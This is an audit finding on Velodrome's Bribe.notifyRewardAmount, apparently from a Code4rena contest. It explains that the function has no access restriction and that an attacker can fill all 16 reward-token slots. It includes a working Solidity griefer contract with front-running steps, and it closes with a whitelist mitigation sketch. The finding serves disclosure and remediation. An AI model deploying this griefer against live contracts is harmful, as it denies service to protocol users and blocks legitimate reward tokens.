Vulnerability details
Impact
The Bribe.notifyRewardAmount function has no access restriction. Anyone, including an attacker, can call it and register arbitrary (even malicious) ERC20 contracts as reward tokens, up to the cap of MAX_REWARD_TOKENS = 16. The only preconditions are amount > 0 and a successful transferFrom, so each slot costs the attacker no more than deploying a throwaway token and transferring a single unit of it.
An attacker can therefore front-run the legitimate call and add 16 fake ERC20 token contracts. Once the limit is reached, the require(rewards.length < MAX_REWARD_TOKENS, ...) check makes every attempt to register a new token revert, so the proper reward tokens can never be added. Note that the check only applies to tokens not yet in isReward, so top-ups of already-registered tokens still succeed; it is the introduction of new tokens that is blocked.
The result is a denial of service on Bribe.notifyRewardAmount for any new reward token and, because Gauge.claimFees depends on that call, a denial of service on Gauge.claimFees as well.
Proof of Concept
The vulnerable function (Bribe.sol#L42); the @audit-info comment marks the missing check:

    function notifyRewardAmount(address token, uint amount) external lock { // @audit-info no access restriction
        require(amount > 0);
        if (!isReward[token]) {
            // only a count check: nothing restricts who may add a token, or which token
            require(rewards.length < MAX_REWARD_TOKENS, "too many rewards tokens");
        }
        // bribes kick in at the start of next bribe period
        uint adjustedTstamp = getEpochStart(block.timestamp);
        uint epochRewards = tokenRewardsPerEpoch[token][adjustedTstamp];
        _safeTransferFrom(token, msg.sender, address(this), amount);
        tokenRewardsPerEpoch[token][adjustedTstamp] = epochRewards + amount;
        if (!isReward[token]) {
            isReward[token] = true;
            rewards.push(token); // slot is consumed permanently; there is no removal path in this function
            IGauge(gauge).addBribeRewardToken(token);
        }
        emit NotifyReward(msg.sender, token, adjustedTstamp, amount);
    }
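The attack described above, written out as an added example (this is not Velodrome code and not part of the original finding). It assumes only the notifyRewardAmount(address,uint) signature and the MAX_REWARD_TOKENS = 16 constant shown in the snippet; the FakeRewardToken contract is a constructed minimal ERC20 whose only job is to make the Bribe's transferFrom succeed, and the IBribe interface is a hypothetical cut-down of Bribe.sol.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Hypothetical interface for the function under discussion; signature taken from the snippet above.
interface IBribe {
    function notifyRewardAmount(address token, uint amount) external;
}

// Constructed throwaway ERC20 (not Velodrome code): just enough of the standard for the
// Bribe's _safeTransferFrom call to succeed and return true.
contract FakeRewardToken {
    string public constant name = "Fake Bribe Token";
    string public constant symbol = "FAKE";
    uint8 public constant decimals = 18;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(address holder) {
        balanceOf[holder] = 1 ether; // worthless, but non-zero so transfers succeed
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        require(balanceOf[from] >= amount, "balance");
        if (from != msg.sender) {
            require(allowance[from][msg.sender] >= amount, "allowance");
            allowance[from][msg.sender] -= amount;
        }
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// Griefer contract: occupies every free reward-token slot of a Bribe in one transaction,
// which is what the front-running attacker in the finding would deploy and call.
contract BribeRewardSlotGriefer {
    uint256 public constant MAX_REWARD_TOKENS = 16; // mirrors the constant in Bribe.sol
    uint256 public slotsFilled;

    function fillRewardSlots(IBribe bribe) external {
        for (uint256 i = 0; i < MAX_REWARD_TOKENS; i++) {
            FakeRewardToken fake = new FakeRewardToken(address(this));
            fake.approve(address(bribe), 1);
            // amount > 0 is the only check on the value, so one unit of a worthless token
            // is enough to push it into `rewards` and set isReward[token] = true.
            try bribe.notifyRewardAmount(address(fake), 1) {
                slotsFilled++;
            } catch {
                // "too many rewards tokens": the list is already full, nothing left to grief
                break;
            }
        }
    }
}
```

Deploy the griefer and call fillRewardSlots(bribe) ahead of (or in the same block as) the legitimate notifyRewardAmount transaction. Once slotsFilled reaches 16, every later call that introduces a token not yet in isReward reverts with "too many rewards tokens"; top-ups of tokens that were already registered still go through, because the length check sits inside the !isReward[token] branch.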
Tools Used
Manual review
Recommended mitigation steps
Consider restricting who may call Bribe.notifyRewardAmount (for example, the gauge or voter contracts and a set of approved bribers), or alternatively maintain a whitelist of tokens that are allowed to be registered as reward tokens, so that an arbitrary caller can no longer consume one of the MAX_REWARD_TOKENS slots with a token of their own making.
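One way to apply the whitelist variant of the mitigation, shown as an added sketch rather than Velodrome's own fix. The storage and event names follow the snippet above; the admin address, the isWhitelisted mapping and the setWhitelist function are assumptions introduced here, and getEpochStart, _safeTransferFrom and the lock modifier are left abstract because their bodies are not on this page.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

interface IGauge {
    function addBribeRewardToken(address token) external;
}

// Hardened sketch (not Velodrome code). Only the whitelist gate in notifyRewardAmount and
// the setWhitelist admin function are new; the rest mirrors the vulnerable function.
abstract contract BribeHardened {
    uint public constant MAX_REWARD_TOKENS = 16;
    address public gauge;
    address public admin;                            // assumption: whoever manages the whitelist
    address[] public rewards;
    mapping(address => bool) public isReward;
    mapping(address => bool) public isWhitelisted;   // added: tokens allowed to become rewards
    mapping(address => mapping(uint => uint)) public tokenRewardsPerEpoch;

    event NotifyReward(address indexed from, address indexed reward, uint epoch, uint amount);
    event WhitelistUpdated(address indexed token, bool allowed);

    modifier lock() virtual;
    function getEpochStart(uint timestamp) public view virtual returns (uint);
    function _safeTransferFrom(address token, address from, address to, uint value) internal virtual;

    function setWhitelist(address token, bool allowed) external {
        require(msg.sender == admin, "not admin");
        isWhitelisted[token] = allowed;
        emit WhitelistUpdated(token, allowed);
    }

    function notifyRewardAmount(address token, uint amount) external lock {
        require(amount > 0);
        if (!isReward[token]) {
            // Added gate: a token can only be *introduced* if it is whitelisted, so a random
            // caller can no longer burn one of the 16 slots with a throwaway ERC20.
            require(isWhitelisted[token], "token not whitelisted");
            require(rewards.length < MAX_REWARD_TOKENS, "too many rewards tokens");
        }
        // bribes kick in at the start of next bribe period
        uint adjustedTstamp = getEpochStart(block.timestamp);
        uint epochRewards = tokenRewardsPerEpoch[token][adjustedTstamp];
        _safeTransferFrom(token, msg.sender, address(this), amount);
        tokenRewardsPerEpoch[token][adjustedTstamp] = epochRewards + amount;
        if (!isReward[token]) {
            isReward[token] = true;
            rewards.push(token);
            IGauge(gauge).addBribeRewardToken(token);
        }
        emit NotifyReward(msg.sender, token, adjustedTstamp, amount);
    }
}
```

Placing the whitelist check only on the first registration keeps the function permissionless for topping up tokens that are already rewards, which is the normal bribing flow; if the protocol prefers the access-restriction variant instead, the same require can be replaced by a caller check (for example, msg.sender == gauge or an approved-briber mapping) at the top of the function.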
Lines of code
https://github.com/code-423n4/2022-05-velodrome/blob/7fda97c570b758bbfa7dd6724a336c43d4041740/contracts/contracts/Bribe.sol#L42